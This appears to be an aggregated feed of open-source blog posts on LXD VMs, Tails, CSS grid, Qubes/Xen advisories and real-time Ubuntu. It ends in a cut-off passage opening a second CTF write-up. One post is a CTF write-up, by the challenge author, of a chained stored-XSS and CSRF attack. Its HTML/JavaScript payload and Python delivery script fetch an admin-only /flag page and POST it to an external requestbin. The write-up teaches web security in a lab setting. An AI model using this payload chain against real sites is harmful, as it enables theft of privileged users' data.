Well… RSS is in a similar predicament. Browsers stopped speaking RSS. They don’t detect it. They don’t offer subscription options to users. They used to a few years ago. That has to have had an impact on the number of people using it today. It’s almost 10 years since the last spec revision. The number of services providing RSS and iCal feeds (iCal being another important protocol) has plummeted as proprietary notification protocols have taken over in disparate third-party services.

If you’re not going with me, consider this: When was RSS last really alive?

I think this matters. It matters to me, and I’d wager that if you’re reading this, you probably still use RSS too. If we want it to carry on existing, being provided for us, we need to start thinking about the reasons it’s in decline —even if it’s not “dead”— and where is best to apply pressure to reverse that.

10 June, 2022 12:00AM

June 09, 2022

hackergotchi for Purism PureOS

Purism PureOS

PureBoot’s Powerful Recovery Console

Normally when we talk about our high-security boot firmware PureBoot, it’s in the context of the advanced tamper detection it adds to a system. For instance, recently we added the ability to detect tampering even in the root file system. While that’s a critical benefit PureBoot provides over our default coreboot firmware, it also provides […]

The post PureBoot’s Powerful Recovery Console appeared first on Purism.

09 June, 2022 06:39PM by Kyle Rankin

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: LXD virtual machines: an overview


While LXD is mostly known for providing system containers, since the 4.0 LTS, it also natively supports virtual machines. With the recent 5.0 LTS, LXD virtual machines are at feature parity with containers. In this blog, we’ll explore some of the main LXD virtual machine features and how you can use them to run your infrastructure.

Why did we include VMs?

When talking about LXD, we often focus on system containers. After all, they are efficient, dense, and give the experience of a VM while being light on resources. However, since containers use the kernel of the host OS, they are not suitable when you would like to run your workloads in a different operating system, or with a different kernel than that of the host.

We have seen many of our users run LXD in parallel with something like libvirt, which adds overhead, as you have to deal with two different environments and configurations. With LXD VMs, we unified that experience.

Some enterprise policies do not consider containers safe enough for certain workloads, so including VMs allows our users to meet those policies as well.

Now, you can use system containers, VMs or manage a cluster that mixes the two, covering most of the infrastructure use cases you might have.

What are LXD VMs based on?

LXD VMs are based on QEMU, like other VMs you would get through libvirt and similar tools. We are, however, opinionated about the setup and the experience, which is why we use a modern Q35 layout with UEFI and SecureBoot by default. All devices are virtio-based (we don’t do any complex device emulation at the host level). 

While functionality doesn’t differ much from other VM virtualization tools, we want to provide a better experience out of the box with pre-installed images and optimised choices. Thanks to a built-in agent, experience with running commands and working with files (‘lxc exec’ and ‘lxc file’) is exactly the same as with containers.

How to set up an LXD virtual machine

The best way to launch VMs is using the images from our community server. There is a wide choice of distributions available; these images are automatically tested daily and include support for the LXD agent out of the box.

Creating a VM is as simple as:

lxc launch ubuntu:22.04 ubuntu --vm

Additional details are available here.

Desktop images

In addition to cloud images for a variety of distributions, we also support desktop images that allow you to launch a desktop VM with no additional configuration needed.

For launching an Ubuntu 22.04 VM the command would look like this:

lxc launch images:ubuntu/22.04/desktop ubuntu --vm -c limits.cpu=4 -c limits.memory=4GiB --console=vga   

The whole process takes seconds, as shown below. 


Read the full tutorial

ISO file

If you want to install an OS or a distribution that is not among the available images, you can install any OS via the ISO file. 

For more details, you can visit this discussion.

Running Windows

If you would like to run a Windows VM, you would first need to repackage the Windows ISO file, using distrobuilder, before proceeding to install it into an LXD virtual machine.

The process is then relatively simple, and you can follow the steps in this video.

Final words on feature parity with containers

With the 4.0 release, LXD virtual machines were initially slightly limited in features. With the 5.0 LTS release, they are now effectively at parity with containers. 

LXD VMs now come with vTPM support, offering security-related functions. For instance, this allows users to create and store private keys and to authenticate access to their systems. VMs also come with arbitrary PCI passthrough support, which enables users to access and manage a variety of hardware devices from a virtual machine. They can now also be live-migrated, and they support some device hotplug and additional storage options.

If you would like to test this for yourself, follow this guide for all major Linux distributions.

To discuss issues, questions, or to get help, please visit our community forum.

09 June, 2022 03:03PM

hackergotchi for Tails

Tails

Tails report for May 2022

Here are a few highlights about what we did in May, among many other things:

  • We implemented many improvements to the Tor Connection assistant. This makes it much easier for people in Asia to circumvent censorship. For details, see the Tails 5.1 release notes.

  • We wrote a new homepage for the Unsafe Browser when you are not connected to the Tor network yet. This new version makes it easier to understand how to sign in to the network using a captive portal.

  • We started organizing training and usability testing sessions for August in Brazil.

  • Tails 5.0 was released on May 3. It was the first version of Tails based on Debian 11 (Bullseye) and brought new versions of a lot of the software included in Tails and new OpenPGP tools.

  • We started evaluating Mirrorbits to manage our download mirror pool. On top of decreasing the required maintenance work, this should make downloads of Tails faster and more reliable.

  • Tails has been started more than 769 997 times this month. This makes 24 838 boots a day on average.

09 June, 2022 10:00AM

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: BSidesSF 2022 CTF: TODO List

This year, I was the author of a few of our web challenges. One of those that gave both us (as administrators) and the players a few difficulties was “TODO List”.

Upon visiting the application, we see an app with a few options, including registering, login, and support. Upon registering, we are presented with an opportunity to add TODOs and mark them as finished:

Add TODOs

If we check robots.txt we discover a couple of interesting entries:

User-agent: *
Disallow: /index.py
Disallow: /flag

Visiting /flag, unsurprisingly, shows us an “Access Denied” error and nothing further. It seems that we’ll need to find some way to elevate our privileges or compromise a privileged user.

The other entry, /index.py, provides the source code of the TODO List app. A few interesting routes jump out at us, not least of which is the routing for /flag:

@app.route('/flag', methods=['GET'])
@login_required
def flag():
    user = User.get_current()
    if not (user and user.is_admin):
        return 'Access Denied', 403
    return flask.send_file(
            'flag.txt', mimetype='text/plain', as_attachment=True)

We see that we will need a user flagged with is_admin. There’s no obvious way to set this value on an account. User IDs as stored in the database are based on a sha256 hash, and the passwords are hashed with argon2. There’s no obvious way to login as an administrator here. There’s an endpoint labeled /api/sso, but it requires an existing session.

Looking at the frontend of the application, we see a pretty simple Javascript to load TODOs from the API, add them to the UI, and handle marking them as finished on click. Most of it looks pretty reasonable, but there’s a case where the TODO is inserted into an HTML string here:

const rowData = `<td><input type='checkbox'></td><td>${data[k].text}</td>`;
const row = document.createElement('tr');
row.innerHTML = rowData;

This looks awfully like an XSS sink, unless the server is pre-escaping the data for us in the API. Easy enough to test though, we can just add a TODO containing <span onclick='alert(1)'>Foobar</span>. We quickly see the span become part of the DOM and a click on it gets the alert we’re looking for.

TODOs

At this point, we’re only able to get an XSS on ourselves, otherwise known as a “Self-XSS”. This isn’t very exciting by itself – running a script as ourselves is not crossing any privilege boundaries. Maybe we can find a way to create a TODO for another user?

@app.route('/api/todos', methods=['POST'])
@login_required
def api_todos_post():
    user = User.get_current()
    if not user:
        return '{}'
    todo = flask.request.form.get("todo")
    if not todo:
        return 'Missing TODO', 400
    num = user.add_todo(todo)
    if num:
        return {'{}'.format(num): todo}
    return 'Too many TODOs', 428

Looking at the code for creating a TODO, it seems quite clear that it depends on the current user. The TODOs are stored in Redis as a single hash object per user, so there’s no apparent way to trick it into storing a TODO for someone else. It is worth noting that there’s no apparent protection against a Cross-Site Request Forgery, but it’s not clear how we could perform such an attack against the administrator.

Maybe it’s time to take a look at the Support site. If we visit it, we see not much at all but a Login page. Clicking on Login redirects us through the /api/sso endpoint we saw before, passing a token in the URL and generating a new session cookie on the support page. Unlike the main TODO app, no source code is to be found here. In fact, the only real functionality is a page to “Message Support”.

Submitting a message to support, we get a link to view our own message. In the page, we have our username, our IP, our User-Agent, and our message. Maybe we can use this for something. Placing an XSS payload in our message doesn’t seem to get anywhere in particular – nothing is firing, at least when we preview it. Obviously an IP address isn’t going to contain a payload either, but we still have the username and the User-Agent. The User-Agent is relatively easily controlled, so we can try something here. cURL is an easy way to give it a try, especially if we use the developer tools to copy our initial request for modification:

curl 'https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryz4kbBFNL12fwuZ57' \
  -H 'cookie: sup_session=75b212f8-c8e6-49c3-a469-cfc369632c72' \
  -H 'origin: https://todolist-support-ebc7039e.challenges.bsidessf.net' \
  -H 'referer: https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'user-agent: <script>alert(1)</script>' \
  --data-raw $'------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="difficulty"\r\n\r\n4\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="message"\r\n\r\nfoobar\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="pow"\r\n\r\n1b4849930f5af9171a90fe689edd6d27\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57--\r\n'

Viewing this message, we see our good friend, the alert box.

Alert 1

Things are beginning to become a bit clear now – we’ve discovered a few things.

  1. The flag is likely on the page /flag of the TODO list manager.
  2. Creating a TODO list entry has no protection against XSRF.
  3. Rendering a TODO is vulnerable to a self-XSS.
  4. Messaging the admin via support appears to be vulnerable to XSS in the User-Agent.

Due to the Same-Origin Policy, the XSS on the support site can’t directly read the resources from the main TODO list page, so we need to do a bit more here.

We can chain these together to (hopefully) retrieve the flag as the admin by sending a message to the admin that contains a User-Agent with an XSS payload that does the following steps:

  1. Uses the XSRF to inject a payload (steps 3+) as a new XSS.
  2. Redirects the admin to their TODO list to trigger the XSS payload.
  3. Uses the Fetch API (or XHR) to retrieve the flag from /flag.
  4. Uses the Fetch API (or XHR) to send the flag off to an endpoint we control.

One additional complication is that <script> tags will not be executed if injected via the innerHTML mechanism in the TODO list. The reasons are complicated, but essentially:

  • innerHTML is parsed using the algorithm described in the Parsing HTML Fragments section of the HTML spec.
  • This creates an HTML parser associated with a new Document node.
  • The script node is parsed by this parser, and then inserted into the DOM of the parent Document.
  • Consequently, the parser document and the element document are different, preventing execution.

We can work around this by using an event handler that will fire asynchronously. My favorite variant of this is doing something like <img src='x' onerror='alert(1)'>.

I began by preparing the payload I wanted to fire on todolist-support as an HTML standalone document. I included a couple of variables for the hostnames involved.

<div id='s2'>
const dest='{{dest}}';
fetch('/flag').then(r => r.text()).then(b => fetch(dest, {method: 'POST', body: b}));
</div>
<script>
const ep='{{ep}}';
const s2=document.getElementById('s2').innerHTML;
const fd=new FormData();
fd.set('todo', '<img src="x" onerror="'+s2+'">');
fetch(ep+'/api/todos',
    {method: 'POST', body: fd, mode: 'no-cors', credentials: 'include'}).then(
        _ => {document.location.href = ep + '/todos'});
</script>

I used the DIV s2 to get the escaping right for the Javascript I wanted to insert into the error handler for the image. This would be the payload executed on todolist, while the lower script tag would be executed on todolist-support. This wasn’t strictly necessary, but it made experimenting with the 2nd stage payload easier.

The todolist-support payload triggered a cross-origin request (hence the need for mode: 'no-cors' and credentials: 'include') to the todolist API to create a new TODO. The new TODO contained an image tag with the contents of s2 as the onerror handler (which would fire as soon as rendered).

That JavaScript first fetched the /flag endpoint, then did a POST to my destination with the contents of the response.

I built a small(ish) python script to send the payload file, and used RequestBin to receive the final flag.

import requests
import argparse
import os


def make_email():
    return os.urandom(12).hex() + '@example.dev'


def register_account(session, server):
    resp = session.post(server + '/register', data={
        'email': make_email(),
        'password': 'foofoo',
        'password2': 'foofoo'})
    resp.raise_for_status()


def get_support(session, server):
    resp = session.get(server + '/support')
    resp.raise_for_status()
    return resp.url


def post_support_message(session, support_url, payload):
    # first sso
    resp = session.get(support_url + '/message')
    resp.raise_for_status()
    msg = "auto-solution-test"
    pow_value = "c8157e80ff474182f6ece337effe4962"
    data = {"message": msg, "pow": pow_value}
    resp = session.post(support_url + '/message', data=data,
            headers={'User-Agent': payload})
    resp.raise_for_status()


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--requestbin',
            default='https://eo3krwoqalopeel.m.pipedream.net')
    parser.add_argument('server', default='http://localhost:3123/',
            nargs='?', help='TODO Server')
    args = parser.parse_args()

    server = args.server
    if server.endswith('/'):
        server = server[:-1]
    sess = requests.Session()
    register_account(sess, server)
    support_url = get_support(sess, server)
    if support_url.endswith('/'):
        support_url = support_url[:-1]
    print('Support URL: ', support_url)
    payload = open('payload.html').read().replace('\n', ' ')
    payload = payload.replace('{{dest}}', args.requestbin
            ).replace('{{ep}}', server)
    print('Payload is: ', payload)
    post_support_message(sess, support_url, payload)
    print('Sent support message.')


if __name__ == '__main__':
    main()

The python takes care of registering an account, redirecting to the support site, logging in there, then sending the payload in the User-Agent header. Checking the request bin will (after a handful of seconds) show us the flag.

09 June, 2022 07:00AM

Oli Warner: CSS layouts are so much better than they used to be

I’ve been doing this web thing a while, and in finally dropping IE11 support for my last few projects, I’ve been able to use raw CSS —not somebody else’s framework— and it’s been lovely to see how far CSS has come.

You whipper-snappers might not appreciate it but CSS used to be pretty janky. You could style some of your content, but getting it into the right places, in a reproducible way was a headache. It was so inconsistent between browsers, and so incompatible with the designs we were paid to implement, we’d use ghastly devices like image <map>, <frameset> and nested <table> elements. We’ve come a long way since then.

The Holy Grail was A List Apart’s famous article, a culmination of years of forebears delicately floating things around, abusing padding and negative margins to achieve something it took a <table> to do before. It’s hard to appreciate 16 years on, but that article was my bible for a while.

As CSS standards improve and old versions of IE died off we saw the rise of CSS Frameworks, third party code, pre-hacked for edge-cases, just follow their markup, use their classes and everything would work. Most of the time. I’ve been through a few: Blueprint, 960, Bootstrap and most recently Tailwind.

And I hate them all. That’s not fair. They’ve helped me, professionally, cope with an increasing number of browsers, and increasingly complex layouts (waves in responsive), and they’ve definitely got better —depending on your opinion on utility-first classes— but they all reset to something slightly different, and while the form classes are genuinely helpful and they all served a purpose for layout, I’d rather not have depended on any of them. It’s those moments where you notice that somebody decided that display: table was the best option to meet IE10 support. And until PurgeCSS came along, they also meant a serious hit to the page weight.

But it’s 2022 now and I’m able to drop IE11 support in most new projects. I can drop all this other crap too. I’m naked again, writing real, raw, standards-abiding CSS without having to look up a billion utility classes, not having to inspect everything. I can just write layouts —my way— and concisely throw things onto the page.

I’m sure I’ll still use frameworks for complex components. Forms are a great example of something that starts off very easy and by the time you’re implementing a <fieldset> style and are trying to plug in your error feedback messages, you wish you’d never started. The standards have some way to go there.

The Holy Grail v2022 — Layout doesn’t have to be hard.

Let’s start with the HTML.

<body>
<header>...</header>
<nav>...</nav>
<main>...</main>
<aside>...</aside>
<footer>...</footer>
</body>

The original example 3 (view source if you dare) needed wrappers and hacks. Our modern markup can mean something. We can ditch the flabby wrapper containers. We can even re-order the elements so they make sense to screen readers and other scrapers.

And our CSS just paints those items into a 3×3 grid via grid-template-areas while the grid-template-* rules handle the sizing. There are so many different ways to handle this with display: grid but I like this one.

html { height: 100% }
body {
  min-height: 100%;
  display: grid;
  grid-template-columns: 180px 1fr 130px;
  grid-template-rows: min-content 1fr min-content;
  grid-template-areas:
    "header header header"
    "left   center right"
    "footer footer footer";
}
body > header { grid-area: header; }
body > nav    { grid-area: left;   }
main          { grid-area: center; }
body > aside  { grid-area: right;  }
body > footer { grid-area: footer; }

That’s 100% width, 100% height, equal height centre columns.
The Holy Grail in its entirety in 30 lines and change.

And it’s quickly adaptable. If you wanted a maximum width, like a lot of layouts (inc this one), you can just tune the grid-template-columns centre column from 1fr to a minmax width, and use justify-content to align the grid to the centre of the <body> element. I’ll add some margin to push the grid away from the edges too.

body {
  margin: 2rem;
  min-height: calc(100% - 2rem); /* tune it to keep full height */
  grid-template-columns: 180px minmax(0, 690px) 130px;
  justify-content: center;
}

Want spacing between zones? Use gap.
Borders and padding can be baked into the sizing using box-sizing.
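For example (the values here are just illustrative):

```css
body {
  gap: 1rem 2rem;           /* 1rem between grid rows, 2rem between columns */
}

*, *::before, *::after {
  box-sizing: border-box;   /* borders and padding count toward the track sizes */
}
```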

It’s excruciatingly simple. This is so much better.

One last time, for the years of suffering and hacking and wasted effort, screw you, IE.

09 June, 2022 12:00AM

hackergotchi for Qubes

Qubes

XSAs released on 2022-06-09

The Xen Project has released one or more Xen Security Advisories (XSAs). The security of Qubes OS is affected. Therefore, user action is required.

XSAs that affect the security of Qubes OS (user action required)

The following XSAs do affect the security of Qubes OS:

  • XSA-401
  • XSA-402

Please see QSB-080 for the actions users must take in order to protect themselves, as well as further details about these XSAs:

https://www.qubes-os.org/news/2022/06/09/qsb-080/

XSAs that do not affect the security of Qubes OS (no user action required)

The following XSAs do not affect the security of Qubes OS, and no user action is necessary:

  • (none)

09 June, 2022 12:00AM

QSB-080: Issues with PV domains and PCI passthrough (XSA-401, XSA-402)

We have just published Qubes Security Bulletin (QSB) 080: Issues with PV domains and PCI passthrough (XSA-401, XSA-402). The text of this QSB is reproduced below. This QSB and its accompanying signatures will always be available in the Qubes Security Pack (qubes-secpack).

View QSB-080 in the qubes-secpack:

https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-080-2022.txt

In addition, you may wish to:


             ---===[ Qubes Security Bulletin 080 ]===---

                             2022-06-09

     Issues with PV domains and PCI passthrough (XSA-401, XSA-402)


User action required
---------------------

Users must install the following specific packages in order to address
the issues discussed in this bulletin:

  For Qubes 4.0, in dom0:
  - Xen packages, version 4.8.5-40

  For Qubes 4.1, in dom0:
  - Xen packages, version 4.14.5-2

These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [1] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [2]

Dom0 must be restarted afterward in order for the updates to take
effect.

If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.


Summary
--------

The following security advisories were published on 2022-06-09:

XSA-401 [3] "x86 pv: Race condition in typeref acquisition":

| Xen maintains a type reference count for pages, in addition to a
| regular reference count.  This scheme is used to maintain invariants
| required for Xen's safety, e.g. PV guests may not have direct
| writeable access to pagetables; updates need auditing by Xen.
| 
| Unfortunately, the logic for acquiring a type reference has a race
| condition, whereby a safety TLB flush is issued too early and creates
| a window where the guest can re-establish the read/write mapping
| before writeability is prohibited.

XSA-402 [4] "x86 pv: Insufficient care with non-coherent mappings":

| Xen maintains a type reference count for pages, in addition to a
| regular reference count.  This scheme is used to maintain invariants
| required for Xen's safety, e.g. PV guests may not have direct
| writeable access to pagetables; updates need auditing by Xen.
| 
| Unfortunately, Xen's safety logic doesn't account for CPU-induced
| cache non-coherency; cases where the CPU can cause the content of the
| cache to be different to the content in main memory.  In such cases,
| Xen's safety logic can incorrectly conclude that the contents of a
| page is safe.


Impact
-------

These vulnerabilities, if exploited, could allow malicious PV domains
with assigned PCI devices to escalate their privileges to that of the
host. However, in the default Qubes OS configuration, these
vulnerabilities affect only the stubdomains for sys-net and sys-usb.
Therefore, in order to exploit these vulnerabilities in a default Qubes
installation, an adversary would first have to discover and exploit an
independent vulnerability in QEMU in order to gain control of an
appropriate stubdomain. Only after having done so would the adversary be
in a position to attempt to exploit the vulnerabilities discussed in
this bulletin.

XSA-402 affects only AMD systems and Intel systems before Ivy Bridge
(the third generation of the Intel Core processors). Newer Intel systems
are not affected.


Credits
--------

See the original Xen Security Advisory.


References
-----------

[1] https://www.qubes-os.org/doc/testing/
[2] https://www.qubes-os.org/doc/how-to-update/
[3] https://xenbits.xen.org/xsa/advisory-401.html
[4] https://xenbits.xen.org/xsa/advisory-402.html

--
The Qubes Security Team
https://www.qubes-os.org/security/

09 June, 2022 12:00AM

June 08, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: Canonical at the Open Source Summit North America 2022


The heart of open source will be beating in Austin and streamed online for the Open Source Summit North America, taking place on 20-25 June 2022.

Open Source Summit is the premier event for open source developers, technologists, and community leaders. It’s a great venue to collaborate, share information, solve problems, and take open source innovation further. 

In this 2022 edition, Canonical will host multiple sessions, from very hands-on and technical talks to discussions exploring the trends that are shaping our industry.

We will address many of the familiar challenges: security, sustainability, and at-scale deployments. We will also delve into some exciting developments like building minimal container images with Ubuntu, or setting up your own micro cloud at home.

Will you be in Austin to attend the Open Source Summit too? Join our community team as well as our speakers on booth B20. We look forward to seeing you there!

Join our sessions at the Open Source Summit North America

Wednesday, 22 June • 11:50am – 12:30pm CDT
Your Own Little HA Cloud at the Edge (or at Home)
Speaker:  Stephane Graber, Project leader for LXD, Canonical
Link to the schedule

Thursday, 23 June • 9:50am – 10:35am CDT
Improving Container Security with System Call Interception
Speakers: Stephane Graber, Project leader for LXD, Canonical & Christian Brauner, Principal Software Engineer, Microsoft
Link to the schedule (co-located Linux Security Summit event)


Friday, 24 June • 11:10am – 11:50am CDT
Rethinking Compliance in a Containerised World
Speakers: Valentin Viennot & Massimiliano Gori, Product, Canonical
Link to the schedule

Friday, 24 June • 11:10am – 11:50am CDT
The Power of the Shell: Measuring Power Consumption of Everyday Linux Commands
Speaker: Pedro Leão Da Cruz, Product Architect, Canonical & Kyle McRobert, Senior Hardware Engineer, Quarch Technology
Link to the schedule

Friday, 24 June • 2:00pm – 3:30pm CDT
How We Built an Ubuntu Distroless Container
Speaker: Valentin Viennot, Containers Product Manager, Canonical
Link to the schedule

Friday, 24 June • 4:00pm – 4:45pm CDT
Crowd-sourcing Vulnerability Severity
Speaker: Henry Coggill, Product Manager, Canonical
Link to the schedule

To get the full programme overview, click here.

08 June, 2022 03:55PM

Ubuntu Blog: An intro to real-time Linux with Ubuntu

A real-time system responds to events within a specified deadline; if the timing constraints of the system are not met, the system has failed. In the kernel context, real-time denotes a deterministic response to an external event, aiming to guarantee a bounded response time.

Real-time Beta now available in Ubuntu 22.04 LTS 

Last April, Canonical announced real-time Ubuntu 22.04 LTS Beta for x86 and Arm64 architectures. Based on v5.15 of the Linux kernel, real-time Ubuntu integrates PREEMPT_RT to power the next generation of industrial, robotics, IoT and telco innovations by providing a deterministic response time to their extreme low-latency requirements.

Canonical Ubuntu 22.04 LTS is released

Real-time Ubuntu is available for free for personal use via Ubuntu Advantage, the most comprehensive Linux enterprise subscription, covering all aspects of open infrastructure. Anyone can enable the real-time kernel per the instructions, and we encourage real-time Ubuntu users to help us by reporting bugs.

Watch our webinar 

If you want to delve deeper into this topic, we recently hosted a webinar covering:

  • What real-time is and common misconceptions
  • Market applications
  • Linux kernel preemption 
  • Preemption modes available in mainline
  • PREEMPT_RT
  • Real-time Ubuntu 22.04 LTS Beta

Thanks to everyone who attended, asked questions and provided feedback throughout the discussion! For those who couldn’t make it, the webinar is now available on-demand.

Watch our webinar: An Introduction to real-time Linux

Below is a recap of the questions asked during the webinar. 

[Q&A] An Introduction to real-time Linux

Q1) What is inside real-time Ubuntu 22.04 LTS Beta? 

A1) Real-time Ubuntu is a Jammy Jellyfish kernel with the upstream real-time patches applied. 

Q2) When do you expect to be out of Beta?

A2) We are targeting April 2023 for the GA of real-time Ubuntu 22.04 LTS. Extensive testing will help us bring the real-time kernel to production earlier. Please support the Ubuntu community by reporting any bugs you may encounter.

Q3) How will the Beta and the GA release differ?

A3) The GA release will run the latest stable kernel available, and it will include the upstream real-time patches matching up with the version. The real-time Linux Analysis (RTLA) tool, merged into upstream 5.17, will also be available with the production-ready real-time Ubuntu kernel, boosting its debugging capabilities.

Q4) What are the main advantages of using the Ubuntu real-time kernel rather than patching a standard kernel?

A4) The main advantage is the enterprise-grade support you will receive from Canonical. 

Q5) Do you have a recommended hardware configuration for testing real-time Ubuntu?

A5) One benefit of the real-time Linux kernel is that it leaves you free in your choice of hardware. We are testing the Beta release on ARM, AMD and Intel hardware and don’t recommend a particular configuration.

Q6) Does real-time Ubuntu work with a 32-bit architecture?

A6) No, we currently focus only on 64-bit architectures.

Q7) Are NVIDIA drivers supported under the Ubuntu real-time kernel? 

A7) The Beta release does not support NVIDIA drivers, but that may change in the future.

Q8) Do you plan on supporting this full task isolation patchset?

A8) We will consider including the patch once it lands in the mainline.

Q9.1) Do you plan on making the upcoming Ubuntu releases have a hybrid of real-time queues and standard Linux kernel queues?
Q9.2) Will Ubuntu support a kernel with both FIPS 140-2 and real-time enabled?
Q9.3) Is there a plan to move toward certification for safety-critical applications such as DO-178 for aviation?

A9) Those are not currently in the plans, but that could change in the future.

Q10) Why would someone pick PREEMPT_RT over a hard real-time solution like Xenomai?

A10) Hard-real-time solutions are expensive and require specific hardware.

Q11) When do you expect PREEMPT_RT to be fully upstreamed?

A11) This is not within Canonical’s control. PREEMPT_RT, the de-facto Linux real-time implementation, is hosted by the Linux Foundation and is slowly being mainlined. While a relevant portion of the locking code is already in mainline, a substantial amount of code still lives only in the upstream patch set.

Q12) How does PREEMPT_RT reduce scheduling and interrupt latency? 

A12) PREEMPT_RT uses different locking mechanisms (e.g. preemptible spin locks) and relies on scheduling classes other than CFS. With PREEMPT_RT enabled, latency-sensitive tasks run in the real-time scheduling classes, which take priority over CFS and provide the first-in-first-out (SCHED_FIFO) and round-robin (SCHED_RR) scheduling policies.
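As a rough illustration (assuming the util-linux chrt tool, present on most distributions), you can inspect and request these scheduling policies from the command line:

```shell
# Show the scheduling policy and priority of the current shell
# (normally SCHED_OTHER, i.e. the default CFS class, priority 0)
chrt -p $$

# Moving a task into the real-time FIFO class usually requires root, e.g.:
#   sudo chrt --fifo 50 ./my_realtime_task
```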

Q13) What is the maximum latency guaranteed by PREEMPT_RT?

A13) PREEMPT_RT does not currently guarantee any maximum latency.

Q14) What is the CPUfreq governor used in PREEMPT_RT?

A14) The CPU governor is currently set to CONFIG_CPU_FREQ_DEFAULT_GOV_ONDEMAND. The cpufrequtils package enables switching to the performance governor with: cpufreq-set -g performance
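As a sketch (the sysfs paths below are exposed on bare-metal Linux systems with cpufreq support, but are often absent in VMs and containers), you can check which governor is active before switching:

```shell
# Print the current and available CPU frequency governors for CPU 0
gov_dir=/sys/devices/system/cpu/cpu0/cpufreq
if [ -d "$gov_dir" ]; then
    echo "current:   $(cat "$gov_dir"/scaling_governor)"
    echo "available: $(cat "$gov_dir"/scaling_available_governors)"
else
    echo "cpufreq not exposed on this system"
fi
```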

Join the free real-time Linux beta programme

Join our free beta programme today. We will keep you up-to-date with the latest news and efforts towards GA, and we will notify you first once the kernel is production-ready. By signing up, you may have the opportunity to establish an open communication channel with our team to provide feedback and share suggestions. 

Further reading

Do you want to work on your next device, but are unsure which OS to pick? Learn about the trade-offs between Yocto and Ubuntu Core now.

Are you ready to get started on the #1 OS choice of developers? Learn about embedded Linux development on Ubuntu today.

08 June, 2022 10:09AM

June 07, 2022

Ubuntu Blog: The Kubernetes Autoscaler Charm

Managing a Kubernetes cluster is a complex endeavor. As demands on a cluster grow, increasing the number of deployed pods can help ease the load on the system. But what do you do when you run out of nodes to host those pods, or when the load decreases and some nodes are no longer needed? Manually adding or removing nodes is possible, but wouldn’t it be better if there was a way to automate that task? Fortunately, that’s exactly what the Kubernetes Autoscaler charm is for! 

Types of Autoscalers

Before diving into the details of the Kubernetes Autoscaler charm, it’s important to understand the different types of autoscaling that are possible in Kubernetes. 

There are three types of autoscaling available: horizontal pod autoscaling, vertical pod autoscaling, and cluster autoscaling. 

Horizontal Pod Autoscaling

Horizontal pod autoscaling involves responding to changes in cluster load by adding and removing pods. As workload demand increases, more pods are added. If the demand slows down, pods are removed.
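For example (a hypothetical manifest; the names web-hpa and web are made up), a HorizontalPodAutoscaler resource keeps a Deployment between 2 and 10 replicas based on average CPU utilisation:

```yaml
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: web-hpa            # hypothetical name
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: web              # hypothetical Deployment to scale
  minReplicas: 2
  maxReplicas: 10
  metrics:
    - type: Resource
      resource:
        name: cpu
        target:
          type: Utilization
          averageUtilization: 80   # add/remove pods to keep ~80% CPU
```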

Horizontal Pod Autoscaling

Vertical Pod Autoscaling

Vertical pod autoscaling adjusts pod memory and CPU limits. When workload demand increases, the resource limits for a pod are increased. Similarly when the demand decreases, the resource limits are lowered. 

Vertical Pod Autoscaling

Cluster Autoscaling

Cluster autoscaling scales the cluster itself, adding nodes to accommodate unscheduled pods, and removing nodes when they become underutilized. 

Cluster Autoscaling

The Kubernetes Autoscaler charm is a cluster autoscaler.

Why would you want to use a cluster autoscaler?

Using a cluster autoscaler allows you to automatically resize your cluster, increasing the number of nodes to meet pod scheduling requirements. On the other hand, the autoscaler can also remove nodes that are not being used. This can save you money, as you can stop using machines that are no longer necessary. A cluster autoscaler can help you maintain a cluster that is just the right size for your current needs. 

How does the Kubernetes Autoscaler Charm work?

The Kubernetes Autoscaler charm is designed to run on top of a Charmed Kubernetes cluster. Once deployed, the autoscaler interacts directly with Juju in order to respond to changing cluster demands. Remember, cluster autoscaling involves adding and removing nodes, so when pods are unable to be scheduled, or if a node is not being fully utilized, the autoscaler charm uses Juju constructs to resolve these issues.

Scale up

When the scheduler is unable to find a node to place a pod on, it will mark that pod as unschedulable. The autoscaler watches for unschedulable pods, and responds by sending a request to Juju asking that a unit be added to the Kubernetes worker application. Juju then adds a unit resulting in a new node being added to the cluster. The pod can then be scheduled on the new node. Problem solved!

Scale Up Process

Scale down

The autoscaler periodically checks to see if any nodes are being underutilized. If it finds an underutilized node, it will attempt to move all the pods currently running on that node to other nodes. Once the node is empty, the autoscaler sends a remove-unit request to Juju to remove the now-empty node. Juju removes the unit from the worker application, which results in the node being removed from the cluster. 
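The Juju operations the autoscaler drives are the same ones an operator could run by hand (illustrative only; application and unit names depend on your deployment):

```shell
juju add-unit kubernetes-worker        # scale up: add a worker node
juju remove-unit kubernetes-worker/3   # scale down: remove a drained node
```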

Scale Down Process

Wrapping up

Autoscaling is a complicated topic, but now you know a little more about the different types of solutions available. You also learned how the Kubernetes Autoscaler charm can solve some of the common problems associated with responding to changing cluster demands, and gained insight into how the autoscaler charm works internally.  

Demo

What next

  • Read the docs to learn how to deploy and configure the Kubernetes Autoscaler charm
  • Deploy the autoscaler charm from Charmhub

07 June, 2022 08:50PM

Salih Emin: Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

07 June, 2022 09:00AM

David Tomaschik: BSidesSF 2022 CTF: Cow Say What?

As the author of the Cow Say What? challenge from this year’s BSidesSF CTF, I got a lot of questions about it after the CTF ended. It’s surprisingly straightforward, but also a very little-known issue.

The challenge was a web challenge – if you visited the service, you got a page providing a textarea for input to the cowsay program, as well as a drop down for the style of the cow saying something (plain, stoned, dead, etc.). There was a link to the source code, reproduced here:

package main

